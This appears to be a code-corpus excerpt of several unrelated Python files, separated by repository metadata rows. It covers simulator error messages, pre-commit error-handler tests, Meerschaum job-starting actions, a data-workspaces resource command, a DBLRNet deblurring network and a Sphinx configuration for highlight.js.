'CantEstimate': "Could not estimate missing %s while initializing %s",
'CantFindPhCh': "Can't find phase changes in %s for more than two sides or when solving in rating mode (UA "
"values specified)",
'CantMoveToStage': "Can't move %s to stage %d of %s. Make sure there are no conflicting names",
'CantOverwriteThermo': "Can't overwrite a thermo case. The correct procedure is to first delete old thermo "
"and then set a new thermo. Unit op: %s; Current thermo: %s",
'CantSetIP': "Can't set interaction parameter with value %f for compounds %s and %s",
'CantSetLiqPhPar': "Can't set number of liquid phases to %s",
'CantSetSingleFrac': "Can't set the mass or volume fraction of one single compound %s in a material port %s.",
'CantSetParameter': "Can't set parameter %s to value %s",
'CantUseSpecInZeroFlow': "Can't use specs in a zero flow draw %s.",
'ChangedEffMatrix': "The efficiencies matrix changed as a result of a change in configuration in %s",
'ChangedPortState': "Changed state of port %s to %d (0=Normal port; 1=Recycle port)",
'CompNotNormalized': "Mole fractions of %s sums to %f, not 1",
'ConnectErrorNoPort': "Can't connect %s.%s to %s.%s as a port is missing",
'ConnectErrorNoUop': "Can't connect %s.%s to %s.%s as a unit op is missing",
'ConnectSameTypePorts': "Attempt to connect ports of differing types in %s",
'ConnectSigToNonSig': "Attempt to connect signal port %s to a non signal port",
'ContDerivCalc': "Controller solver for %s calculating derivative %d",
'ControllerConvergeFail': "Controller solver for %s failed to converge",
'ControllerTotalError': "Controller solver for %s error - %f", 'Converged': "Converged %s in %i iterations",
'ConvergedOp': "Converged %s", 'CouldNotConverge': "Could not converge %s after %d iterations",
'CouldNotConvergeInner': "Could not converge Inner loop %s after %d iterations",
'CouldNotConvergeOuter': "Could not converge Outer loop %s after %d iterations",
'CouldNotConvergeUA': "Could not solve for UA = %f in %s",
'CouldNotInitialize': "Could not initialize set of equations when solving %s",
'CouldNotInvertJacobian': "Could not invert Jacobian in %s",
'CouldNotLoadLanguage': "Could not load language %s",
'CouldNotLoadProvider': "Could not load thermo provider %s",
'CouldNotRestorePlugIn': "Could not restore plug in object %s when recalling case. The default object will "
"be used instead",
'CouldNotSolve': "Could not solve %s",
'CouldNotSolveNonSuppFlash': "Could not solve non supported flash with variables %s = %s, %s = %s in %s",
'CreatePortTypeError': "Port %s does not have a valid type in %s",
'CrossConnMoleLoss': "A significant loss of mole flow of %f was detected in the cross connector %s. A common "
"reason is the mismatch of compounds that contain significant flows",
'DeletePortError': "Cannot delete port %s from %s",
'DewTCouldNotCalc': "Dew Point temperature could not be calculated in %s at P = %s kPa and composition = %s",
'DiffThCaseInConn': "Different thermo case found across port connection %s -> %s. The values could not be "
"passed",
'DoneProfile': "Done calculating profile in %s",
'DuplicateName': "Command failed due to a duplication of the name %s in %s",
'ErrInCleanUp': "Error while cleaning up %s",
'ErrNotifyChangeCmp': "Error while notifying %s of a change in the compounds list",
'ErrNotifyLiqChange': "Error while notifying %s of a change of the number of liquid phases. LiquidPhases = %s",
'ErrNotifyParChange': "Error while notifying %s of a change of the value of a parameter. %s = %s",
'ErrNotifySolChange': "Error while notifying %s of a change of the number of solid phases. LiquidPhases = %s",
'ErrNotifyThChange': "Error while notifying %s of a change of thermodynamic case. ThermoCase = %s",
'ERRSettingThermo': "Error attempting to set thermo into unit op: %s; Thermo attempted: %s",
'ErrSpecialProp': "Error calculating special property in %s. Message form thermo provider: %s",
'ErrorSolvingDesign': "Error solving design object %s",
'ERRTowerArithmetic': "Tower %s failed to converge due to an arithmetic error",
'EqnCalcError': "Calculation error in %s",
'EqnDuplicateSigName': "Signal name %s is used more than once in equation %s",
'EqnNumbMismatch': "Error in equation counting in %s",
'EqnParenMismatch': "Mismatched parenthesis in %s of Equation %s",
'EqnSyntax': "Syntax error in %s in Equation %s",
'EqnUnknownToken': "Don't know how to deal with %s in equation %s of %s",
'EqnBasedUOpError': "%s Iteration %d Max Error %f",
'FlashFailure': "Flash failed in %s. Message from Thermo Provider: %s",
'HotTLowerThanColdT': "The temperature of the hot inlet %f is lower than the temperature of the cold inlet "
"%f in %s",
'HydrateCouldNotCalc': "Hydrate temperature could not be calculated in %s at P = %s kPa and composition = %s",
'HydrateLowP': "Hydrate can not be formed at low pressure condition of P = %s kPa in %s",
'InnerErrorDetail': "%s Inner Details. Error: %13.6g ; MaxErrorValue: %13.6g ; MaxErrorEqnName: %s ",
'InnerLoopSummary': """%s Inner Loop Summary:
MaxErrorEqnName:......... %s
MaxErrorValue:........... %.6g
MaxDeltaTStage(0 at top): %i
MaxDeltaTValue(New-Old):. %.4g
Converged:............... %i
Iterations:.............. %i""", 'InvalidCalcStatusInSet': "Invalid calcStatus in SetValue",
'InvalidComposition': "The %s composition = %f in %s. It has been reset to zero.",
'InvalidDrawPhase': "Invalid phase for draw on stage %d of %s",
'InvalidTowerSpecPhase': "Invalid phase in spec on stage %d of %s",
'LumpLiqs': "A second liquid with fraction %f is detected in a two phase VL flash.",
'MaxSolverIterExceeded': "Maximum %d iterations exceeded in solving flowsheet %s",
'MissingSpecs': "Missing %d specifications", 'MissingVariable': "Missing %s in %s",
'MissigZInCommonProps': "Z Factor should always be in the common properties. Attempted to set: %s",
'NonHydrateFormerFound': "Non hydrate former was found coming into %s",
'NoPortDirection': "Port %s requires direction (in or out) in %s",
'NoSupportForReqArrProps': "The thermo provider %s doesn't support the following required array properties %s",
'NoSupportForReqProps': "The thermo provider %s doesn't support the following required properties %s",
'NotConverging': "%s does not seem to be converging and calculations were stopped. Change the parameter "
"MonitorConvergence to 0 if you wish to deactivate this feature",
'NoVersionUpdate': "No update for %d (%s) to %d (%s)",
'ODEMaxSteps': "Maximum integration steps reached (%i) in %s. Increase ODEMaxSteps if integration was "
"proceeding correctly",
'OuterErrorDetail': "%s Iteration %d Outer Error %13.6g. MaxErrorStage(0 at top) %i WaterDrawError %13.6g",
'OverspecFlash': "Could not perform flash calculation in %s because it is overspecified. Only 2 variables "
"needed and %i were given (%s)",
'PortNotFlashedDesignObj': "Ports from unit op are not flashed therefore design object %s not ready to be "
"solved",
'RawOutput': "%s", 'RecycleErrorDetail': "%s %s %g vs %g",
'RecycleConsistency': "Consistency Error %s %s %g vs %g", 'RecycleIter': "Iteration %d -> max Error %f in %s",
'RenamePort': "Rename port %s.%s to %s. It is connected to %s",
'RenamePortError': "Cannot rename port %s to %s",
'RenamePortNameExists': "Cannot rename port %s to %s as that name is already used",
'RevertingFromNewerVersion': "Recalling case created in a newer version. Updating from: flowsheet version "
"%d, release version %s. To: flowsheet version %d release version %s",
'SetValueUnknownNotNone': "SetValue with UNKNOWN_V flag must have value = None",
'SetVarTypeMismatch': "Port variable type %s is not %s in %s",
'SigConnectTypeMismatch': "Variable type conflict (%s vs %s) when connecting %s to %s",
'SigShareMismatch': "Variable type conflict (%s vs %s) when sharing %s with %s",
'SolvingDesign': "Solving design object %s", 'SolvingOp': "Solving operation %s",
'SpecConflict': "Specification conflict between %s and %s in %s", 'Status': "%s",
'StepSizeTooSmall': "Step size underflow in %s. Step size = %g",
'TemperatureCross': "Temperature cross (%f %f) in %s",
'InternalTCross': "Internal temperature cross in %s. See profiles for details",
'NoPkgSelected': "No thermo package was selected when attempted to create %s",
'ThermoProviderMsg': "Msg from thermo provider when solving %s:\n%s",
'TooManySolidPhases': "Too many solid phases requested(%d) when attempting flash from %s",
'TooManyTowerSpecs': "%d specs found, only %d needed in %s",
'TowerCalcJacobian': "Calculating Jacobian for %s",
'TowerCmpMatrixError': "%s had an error in solving the material balances for component %d",
'TowerDeletePort': "Cannot directly delete port %s from %s. Select and delete the associated draw or spec",
'TowerEffSetToOne': "Tower efficiency in the top stage was set to 1.0 because the vapour draw is 0",
'TowerFailedToConverge': "%s failed to converge in %d iterations - error = %f",
'TowerInnerError': "%s Inner Error %f", 'TowerNoPressure': "No outlet pressures available for tower %s",
'TowerOuterError': "%s Iteration %d Outer Error %f", 'TowerQSpecError': "Can't assign energy flow to stage %d",
'TowerRemoveLastStage': "Cannot remove %d stages from below stage %d",
'TowerPARemovalError': "Cannot remove a stage with a feed from a pump around unless the pump around is "
"removed too. Feed is in stage %i, pump around from stage %i",
'TowerSSRemoveError': "Top or bottom tower stages cannot be removed unless the whole section is removed",
'TowerUpdateEffErr': "An error occurred while attempting to update the efficiencies matrix in %s. Please "
"update manually",
'TowerMissingFeedInfo': "Feed %s is not fully specified", 'TwrNoFeed': "No feeds were found in %s",
'TwrSpecErr': "Error while calculating the spec %s",
'TwrSpecErrConfig': "The spec %s was installed into an invalid object %s. For example, a pump around spec "
"installed into something different from a pump around",
'TwrSubCooledVapDraw': "Tower failed to converge due to a sub cooled solution at the top where there is a "
"vapour draw. Degrees of subcooling = %f",
'UnresolvedConsistencyErrors': "The following consistency errors in flowsheet %s have not been resolved ("
"only lists one per unit operation):\n%s",
'UnresolvedRecycles': "The following recycle ports in flowsheet %s have not been converged (only lists one "
"per unit operation):\n%s",
'UpdateInvalidPort': "Port %s does not exist in %s - can't update",
'WrongDiamEjector': "Wrong diameter specification in %s. Nozzle diameter must be smaller than throat "
"diameter. Nozzle D = %f; Throat D = %f",
'WrongNumberTowerSpecs': "Mismatch in number of tower specs - %d vs %d needed in %s",
'WrongParentDesignObj': "Design object %s contained in the wrong type of unit operation",
'WrongSetting': "Invalid value %s for setting %s in object %s", 'DoneSolving': "Flowsheet %s solved",
'NoMessage': "", 'MissingValue': "%s has no value", 'ErrorValue': "Error = %s", 'OK': "OK", 'T': "Temperature",
'P': "Pressure", 'H': "Enthalpy", 'VapFrac': "VapFrac", 'MoleFlow': "MoleFlow", 'MassFlow': "MassFlow",
'VolumeFlow': "VolumeFlow", 'Energy': "Energy", 'MolecularWeight': "MolecularWeight", 'ZFactor': "ZFactor"}
# Following messages not in alphabetical order to keep all the properties together
return m
| 85.22093 | 120 | 0.637331 |
833bb8f8372c0d90bf498190eabbce78609b69a9 | 5,098 | py | Python | tests/error_handler_test.py | Pierre-Sassoulas/pre-commit | fd53cdea17ed17a1775fc5e23e75d6ecdbdb04b6 | [
"MIT"
] | 1 | 2020-07-25T12:34:17.000Z | 2020-07-25T12:34:17.000Z | tests/error_handler_test.py | Pierre-Sassoulas/pre-commit | fd53cdea17ed17a1775fc5e23e75d6ecdbdb04b6 | [
"MIT"
] | null | null | null | tests/error_handler_test.py | Pierre-Sassoulas/pre-commit | fd53cdea17ed17a1775fc5e23e75d6ecdbdb04b6 | [
"MIT"
] | 18 | 2020-06-20T07:52:16.000Z | 2022-01-20T22:03:26.000Z | import os.path
import re
import sys
from unittest import mock
import pytest
from pre_commit import error_handler
from pre_commit.util import CalledProcessError
from testing.util import cmd_output_mocked_pre_commit_home
@pytest.fixture
def mocked_log_and_exit():
with mock.patch.object(error_handler, '_log_and_exit') as log_and_exit:
yield log_and_exit
def test_error_handler_no_exception(mocked_log_and_exit):
with error_handler.error_handler():
pass
assert mocked_log_and_exit.call_count == 0
def test_error_handler_fatal_error(mocked_log_and_exit):
exc = error_handler.FatalError('just a test')
with error_handler.error_handler():
raise exc
mocked_log_and_exit.assert_called_once_with(
'An error has occurred',
exc,
# Tested below
mock.ANY,
)
assert re.match(
r'Traceback \(most recent call last\):\n'
r' File ".+pre_commit.error_handler.py", line \d+, in error_handler\n'
r' yield\n'
r' File ".+tests.error_handler_test.py", line \d+, '
r'in test_error_handler_fatal_error\n'
r' raise exc\n'
r'(pre_commit\.error_handler\.)?FatalError: just a test\n',
mocked_log_and_exit.call_args[0][2],
)
def test_error_handler_uncaught_error(mocked_log_and_exit):
exc = ValueError('another test')
with error_handler.error_handler():
raise exc
mocked_log_and_exit.assert_called_once_with(
'An unexpected error has occurred',
exc,
# Tested below
mock.ANY,
)
assert re.match(
r'Traceback \(most recent call last\):\n'
r' File ".+pre_commit.error_handler.py", line \d+, in error_handler\n'
r' yield\n'
r' File ".+tests.error_handler_test.py", line \d+, '
r'in test_error_handler_uncaught_error\n'
r' raise exc\n'
r'ValueError: another test\n',
mocked_log_and_exit.call_args[0][2],
)
def test_error_handler_keyboardinterrupt(mocked_log_and_exit):
exc = KeyboardInterrupt()
with error_handler.error_handler():
raise exc
mocked_log_and_exit.assert_called_once_with(
'Interrupted (^C)',
exc,
# Tested below
mock.ANY,
)
assert re.match(
r'Traceback \(most recent call last\):\n'
r' File ".+pre_commit.error_handler.py", line \d+, in error_handler\n'
r' yield\n'
r' File ".+tests.error_handler_test.py", line \d+, '
r'in test_error_handler_keyboardinterrupt\n'
r' raise exc\n'
r'KeyboardInterrupt\n',
mocked_log_and_exit.call_args[0][2],
)
def test_log_and_exit(cap_out, mock_store_dir):
with pytest.raises(SystemExit):
error_handler._log_and_exit(
'msg', error_handler.FatalError('hai'), "I'm a stacktrace",
)
printed = cap_out.get()
log_file = os.path.join(mock_store_dir, 'pre-commit.log')
assert printed == f'msg: FatalError: hai\nCheck the log at {log_file}\n'
assert os.path.exists(log_file)
with open(log_file) as f:
logged = f.read()
expected = (
r'^### version information\n'
r'\n'
r'```\n'
r'pre-commit version: \d+\.\d+\.\d+\n'
r'sys.version:\n'
r'( .*\n)*'
r'sys.executable: .*\n'
r'os.name: .*\n'
r'sys.platform: .*\n'
r'```\n'
r'\n'
r'### error information\n'
r'\n'
r'```\n'
r'msg: FatalError: hai\n'
r'```\n'
r'\n'
r'```\n'
r"I'm a stacktrace\n"
r'```\n'
)
assert re.match(expected, logged)
def test_error_handler_non_ascii_exception(mock_store_dir):
with pytest.raises(SystemExit):
with error_handler.error_handler():
raise ValueError('☃')
def test_error_handler_non_utf8_exception(mock_store_dir):
with pytest.raises(SystemExit):
with error_handler.error_handler():
raise CalledProcessError(1, ('exe',), 0, b'error: \xa0\xe1', b'')
def test_error_handler_non_stringable_exception(mock_store_dir):
class C(Exception):
def __str__(self):
raise RuntimeError('not today!')
with pytest.raises(SystemExit):
with error_handler.error_handler():
raise C()
def test_error_handler_no_tty(tempdir_factory):
pre_commit_home = tempdir_factory.get()
ret, out, _ = cmd_output_mocked_pre_commit_home(
sys.executable,
'-c',
'from pre_commit.error_handler import error_handler\n'
'with error_handler():\n'
' raise ValueError("\\u2603")\n',
retcode=1,
tempdir_factory=tempdir_factory,
pre_commit_home=pre_commit_home,
)
log_file = os.path.join(pre_commit_home, 'pre-commit.log')
out_lines = out.splitlines()
assert out_lines[-2] == 'An unexpected error has occurred: ValueError: ☃'
assert out_lines[-1] == f'Check the log at {log_file}'
| 29.812865 | 79 | 0.618086 |
0375d6a7e406b04bf04969ee7852cf83e447c249 | 11,257 | py | Python | meerschaum/actions/start.py | bmeares/Meerschaum | 37bd7a9923efce53e91c6a1d9c31f9533b9b4463 | [
"Apache-2.0"
] | 32 | 2020-09-14T16:29:19.000Z | 2022-03-08T00:51:28.000Z | meerschaum/actions/start.py | bmeares/Meerschaum | 37bd7a9923efce53e91c6a1d9c31f9533b9b4463 | [
"Apache-2.0"
] | 3 | 2020-10-04T20:03:30.000Z | 2022-02-02T21:04:46.000Z | meerschaum/actions/start.py | bmeares/Meerschaum | 37bd7a9923efce53e91c6a1d9c31f9533b9b4463 | [
"Apache-2.0"
] | 5 | 2021-04-22T23:49:21.000Z | 2022-02-02T12:59:08.000Z | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
"""
Start subsystems (API server, logging daemon, etc.).
"""
from __future__ import annotations
from meerschaum.utils.typing import SuccessTuple, Optional, List, Any
def start(
action : Optional[List[str]] = None,
**kw : Any,
) -> SuccessTuple:
"""
Start subsystems (API server, logging daemon, etc.).
"""
from meerschaum.utils.misc import choose_subaction
options = {
'api' : _start_api,
'jobs' : _start_jobs,
}
return choose_subaction(action, options, **kw)
def _complete_start(
action : Optional[List[str]] = None,
**kw : Any
) -> List[str]:
"""
Override the default Meerschaum `complete_` function.
"""
if action is None:
action = []
options = {
'job' : _complete_start_jobs,
'jobs' : _complete_start_jobs,
}
if (
len(action) > 0 and action[0] in options
and kw.get('line', '').split(' ')[-1] != action[0]
):
sub = action[0]
del action[0]
return options[sub](action=action, **kw)
from meerschaum.actions.shell import default_action_completer
return default_action_completer(action=(['start'] + action), **kw)
def _start_api(action : Optional[List[str]] = None, **kw):
"""
Start the API server.
Usage:
`start api {options}`
Options:
- `-p, --port {number}`
Port to bind the API server to.
- `-w, --workers {number}`
How many worker threads to run.
Defaults to the number of CPU cores or 1 on Android.
"""
from meerschaum.actions import actions
return actions['api'](action=['start'], **kw)
def _start_jobs(
action : Optional[List[str]] = None,
name : Optional[str] = None,
**kw
) -> SuccessTuple:
"""
Run a Meerschaum action as a background job.
To create a new job, pass the command arguments after `start job`.
To start a stopped job, pass the job name after `start job`.
You may also run a background job with the `-d` or `--daemon` flags.
Examples:
Create new jobs:
- `start job sync pipes --loop`
Run the action `sync pipes --loop` as a background job.
Generates a random name; e.g. 'happy_seal'.
- `start api --daemon --name api_server`
Run the action `start api` as a background job, and assign the job
the name 'api_server'.
Start stopped jobs:
- `start job happy_seal`
Start the job 'happy_seal'.
- `start job --name happy_seal`
Start the job 'happy_seal' but via the `--name` flag.
This only applies when no text follows the words 'start job'.
"""
import textwrap
from meerschaum.utils.warnings import warn, info
from meerschaum.utils.daemon import (
daemon_action, Daemon, get_daemon_ids, get_daemons, get_filtered_daemons,
get_stopped_daemons, get_running_daemons
)
from meerschaum.utils.daemon._names import get_new_daemon_name
from meerschaum.actions.arguments._parse_arguments import parse_arguments
from meerschaum.actions import actions
from meerschaum.utils.prompt import yes_no
from meerschaum.utils.formatting import print_tuple
from meerschaum.utils.formatting._jobs import pprint_job, pprint_jobs
from meerschaum.utils.formatting._shell import clear_screen
from meerschaum.utils.misc import items_str
names = []
daemon_ids = get_daemon_ids()
new_job = len(list(action)) > 0
_potential_jobs = {'known' : [], 'unknown' : []}
if action:
for a in action:
_potential_jobs[('known' if a in daemon_ids else 'unknown')].append(a)
### Check if the job is named after an action.
if (
_potential_jobs['known']
and _potential_jobs['unknown']
and _potential_jobs['known'][0] == action[0]
and _potential_jobs['known'][0] in actions
):
_potential_jobs['unknown'].insert(0, _potential_jobs['known'][0])
del _potential_jobs['known'][0]
### Only spawn a new job if we don't don't find any jobs.
new_job = (len(_potential_jobs['known']) == 0)
if not new_job and _potential_jobs['unknown']:
if not kw.get('nopretty', False):
warn(
(
"Unknown job" + ("s" if len(_potential_jobs['unknown']) > 1 else '') + " "
+ items_str(_potential_jobs['unknown'])
+ " will be ignored."
),
stack = False
)
### Determine the `names` list.
if new_job:
names = [(get_new_daemon_name() if not name else name)]
elif not new_job and not name:
names = _potential_jobs['known']
### Cannot find dameon_id
else:
msg = (
f"Unknown job" + ('s' if len(action) != 1 else '') + ' '
+ items_str(action, and_str='or') + '.'
)
return False, msg
### No action provided but a --name was. Start job if possible.
### E.g. `start job --myjob`
elif name is not None:
new_job = False
names = [name]
### No action or --name was provided. Ask to start all stopped jobs.
else:
_stopped_daemons = get_stopped_daemons()
if not _stopped_daemons:
return False, "No jobs to start."
names = [d.daemon_id for d in _stopped_daemons]
def _run_new_job(name : Optional[str] = None):
kw['action'] = action
if not name:
name = get_new_daemon_name()
kw['name'] = name
_action_success_tuple = daemon_action(daemon_id=name, **kw)
return _action_success_tuple, name
def _run_existing_job(name : Optional[str] = None):
daemon = Daemon(daemon_id=name)
if not daemon.path.exists():
if not kw.get('nopretty', False):
warn(f"There isn't a job with the name '{name}'.", stack=False)
print(
f"You can start a new job named '{name}' with `start job "
+ "{options}" + f" --name {name}`"
)
return (False, f"Job '{name}' does not exist."), daemon.daemon_id
daemon.cleanup()
try:
_daemon_sysargs = daemon.properties['target']['args'][0]
except KeyError:
return False, "Failed to get arguments for daemon '{dameon.daemon_id}'."
_daemon_kw = parse_arguments(_daemon_sysargs)
_daemon_kw['name'] = daemon.daemon_id
_action_success_tuple = daemon_action(
**_daemon_kw
)
if not _action_success_tuple[0]:
return _action_success_tuple, daemon.daemon_id
return (True, f"Success"), daemon.daemon_id
if not names:
return False, "No jobs to start."
### Get user permission to clear logs.
_filtered_daemons = get_filtered_daemons(names)
if not kw.get('force', False) and _filtered_daemons:
_filtered_running_daemons = get_running_daemons(_filtered_daemons)
if _filtered_running_daemons:
pprint_jobs(_filtered_running_daemons)
if yes_no(
"The above jobs are still running. Do you want to first stop these jobs?",
default = 'n',
yes = kw.get('yes', False),
noask = kw.get('noask', False)
):
stop_success_tuple = actions['stop'](
action = ['jobs'] + [d.daemon_id for d in _filtered_running_daemons],
force = True,
)
if not stop_success_tuple[0]:
warn(
"Failed to stop job" + ("s" if len(_filtered_running_daemons) != 1 else '')
+ items_str([d.daemon_id for d in _filtered_running_daemons])
+ ".",
stack = False
)
for d in _filtered_running_daemons:
names.remove(d.daemon_id)
_filtered_daemons.remove(d)
else:
info(
"Skipping already running job"
+ ("s" if len(_filtered_running_daemons) != 1 else '') + ' '
+ items_str([d.daemon_id for d in _filtered_running_daemons]) + '.'
)
for d in _filtered_running_daemons:
names.remove(d.daemon_id)
_filtered_daemons.remove(d)
if not _filtered_daemons:
return False, "No jobs to start."
pprint_jobs(_filtered_daemons, nopretty=kw.get('nopretty', False))
if not yes_no(
(
f"Would you like to overwrite the logs and run the job"
+ ("s" if len(names) != 1 else '') + " " + items_str(names) + "?"
),
default = 'n',
yes = kw.get('yes', False),
nopretty = kw.get('nopretty', False),
noask = kw.get('noask', False),
):
return (False, "Nothing was started.")
_successes, _failures = [], []
for _name in names:
success_tuple, __name = _run_new_job(_name) if new_job else _run_existing_job(_name)
if success_tuple[0]:
if kw.get('nopretty', False):
print_tuple(True, f"Successfully started job '{__name}'.")
_successes.append(_name)
else:
_failures.append(_name)
msg = (
(("Successfully started job" + ("s" if len(_successes) != 1 else '')
+ f" {items_str(_successes)}." + ('\n' if _failures else ''))
if _successes else '')
+ ("Failed to start job" + ("s" if len(_failures) != 1 else '')
+ f" {items_str(_failures)}." if _failures else '')
)
return len(_successes) > 0, msg
def _complete_start_jobs(
action : Optional[List[str]] = None,
line : str = '',
**kw
) -> List[str]:
from meerschaum.utils.daemon import get_daemon_ids
daemon_ids = get_daemon_ids()
if not action:
return daemon_ids
possibilities = []
# if action[-1] in daemon_ids:
# return daemon_ids
_line_end = line.split(' ')[-1]
for daemon_id in daemon_ids:
# if daemon_id.startswith(action[-1]) and (
# daemon_id not in action or _line_end == ''
# ):
if daemon_id in action:
continue
if _line_end == '':
possibilities.append(daemon_id)
continue
if daemon_id.startswith(action[-1]):
possibilities.append(daemon_id)
return possibilities
### NOTE: This must be the final statement of the module.
### Any subactions added below these lines will not
### be added to the `help` docstring.
from meerschaum.utils.misc import choices_docstring as _choices_docstring
start.__doc__ += _choices_docstring('start')
| 35.178125 | 99 | 0.561784 |
4ef6d9de4681ea32e4bdb6c04f2857d368edf988 | 1,260 | py | Python | dataworkspaces/commands/add.py | jfischer/data-workspaces-python | 5787fb2488d9dc407b6193a38d71aed955d7158c | [
"Apache-2.0"
] | 6 | 2019-04-16T10:44:41.000Z | 2021-02-24T09:34:10.000Z | dataworkspaces/commands/add.py | jfischer/data-workspaces-python | 5787fb2488d9dc407b6193a38d71aed955d7158c | [
"Apache-2.0"
] | 67 | 2019-03-08T13:32:31.000Z | 2022-03-09T15:15:41.000Z | dataworkspaces/commands/add.py | jfischer/data-workspaces-python | 5787fb2488d9dc407b6193a38d71aed955d7158c | [
"Apache-2.0"
] | 2 | 2020-04-24T02:48:56.000Z | 2022-01-14T01:07:48.000Z | # Copyright 2018,2019 by MPI-SWS and Data-ken Research. Licensed under Apache 2.0. See LICENSE.txt.
import click
from dataworkspaces.errors import ConfigurationError
from dataworkspaces.workspace import Workspace
def add_command(scheme: str, role: str, name: str, workspace: Workspace, *args):
current_names = set(workspace.get_resource_names())
if workspace.batch:
if name == None:
name = workspace.suggest_resource_name(scheme, role, *args)
else:
if name in current_names:
raise ConfigurationError("Resource name '%s' already in use" % name)
else:
suggested_name = None
while (name is None) or (name in current_names):
if suggested_name == None:
suggested_name = workspace.suggest_resource_name(scheme, role, *args)
name = click.prompt(
"Please enter a short, unique name for this resource", default=suggested_name
)
if name in current_names:
click.echo("Resource name '%s' already in use." % name, err=True)
workspace.add_resource(name, scheme, role, *args)
workspace.save("add of %s" % name)
click.echo("Successful added resource '%s' to workspace." % name)
| 39.375 | 99 | 0.651587 |
8573f739eb3c5ae02c4ec68682b029320e9b189e | 2,261 | py | Python | simdeblur/model/backbone/dblrnet/dblrnet.py | ljzycmd/SimDeblur | dd2f60c41176b75c4eaf80d740f547c206aa8227 | [
"MIT"
] | 190 | 2021-03-22T13:59:42.000Z | 2022-03-08T21:14:41.000Z | simdeblur/model/backbone/dblrnet/dblrnet.py | Wang-jiahao/SimDeblur | 31d88e1fbec91d5cc9062f4a46538e4ba806ab29 | [
"MIT"
] | 9 | 2021-04-26T06:44:40.000Z | 2022-03-25T07:48:30.000Z | simdeblur/model/backbone/dblrnet/dblrnet.py | Wang-jiahao/SimDeblur | 31d88e1fbec91d5cc9062f4a46538e4ba806ab29 | [
"MIT"
] | 27 | 2021-03-23T03:11:00.000Z | 2022-03-19T21:26:02.000Z | """
Adversarial Spatio-Temporal Learning for Video Deblurring
The DBLRNet adopts 3D convolution for spatio-temporal modeling, which serves as a generator for adversarial training.
"""
import torch
import torch.nn as nn
from ...build import BACKBONE_REGISTRY
@BACKBONE_REGISTRY.register()
class DBLRNet(nn.Module):
def __init__(self, num_frames, in_channels, inner_channels):
super(DBLRNet, self).__init__()
self.num_frames = num_frames
self.in_channels = in_channels
self.inner_channels = inner_channels
self.layer_counts = 15
self.L_in = nn.Sequential(
nn.Conv3d(self.in_channels, 16, kernel_size=(3, 3, 3), stride=(1, 1, 1), padding=(0, 1, 1)),
nn.ReLU(inplace=True),
nn.Conv3d(16, self.inner_channels, kernel_size=(3,3,3), stride=(1, 1, 1), padding=(0, 1, 1)),
nn.ReLU(inplace=True)
)
Ln = []
for i in range(self.layer_counts):
Ln.append(
ResBlock(self.inner_channels)
)
self.Ln = nn.Sequential(
*Ln
)
self.L_out = nn.Sequential(
nn.Conv2d(self.inner_channels, self.inner_channels * 4, 3, 1, 1),
nn.ReLU(),
nn.Conv2d(self.inner_channels * 4, self.inner_channels * 4, 3, 1, 1),
nn.ReLU(),
nn.Conv2d(self.inner_channels * 4, 3, 3, 1, 1)
)
def forward(self, x):
assert x.dim() == 5, "Input tensor should be in 5 dims!"
b, n, c, h, w = x.shape
x = x.transpose(1, 2)
l2 = self.L_in(x)
ln = self.Ln(l2.view(b, -1, h, w))
out = self.L_out(ln + l2.view(b, -1, h, w))
return out
class ResBlock(nn.Module):
def __init__(self, in_channels):
super(ResBlock, self).__init__()
self.in_channels = in_channels
self.convs = nn.Sequential(
nn.Conv2d(self.in_channels, self.in_channels, 3, 1, 1),
nn.BatchNorm2d(num_features=self.in_channels),
nn.ReLU(),
nn.Conv2d(self.in_channels, self.in_channels, 3, 1, 1),
nn.BatchNorm2d(num_features=self.in_channels)
)
def forward(self, x):
return self.convs(x) + x | 29.363636 | 117 | 0.576294 |
77654e12fc54fee139299f96319413aa82c8a133 | 7,778 | py | Python | docs/conf.py | lucasb-eyer/highlight.js | a5f137457daa01677e475379f5d9ead184bcf3c4 | [
"BSD-3-Clause"
] | null | null | null | docs/conf.py | lucasb-eyer/highlight.js | a5f137457daa01677e475379f5d9ead184bcf3c4 | [
"BSD-3-Clause"
] | null | null | null | docs/conf.py | lucasb-eyer/highlight.js | a5f137457daa01677e475379f5d9ead184bcf3c4 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
#
# highlight.js documentation build configuration file, created by
# sphinx-quickstart on Wed Sep 12 23:48:27 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'highlight.js'
copyright = u'2012–2015, Ivan Sagalaev'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '9.2'
# The full version, including alpha/beta/rc tags.
release = '9.2.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
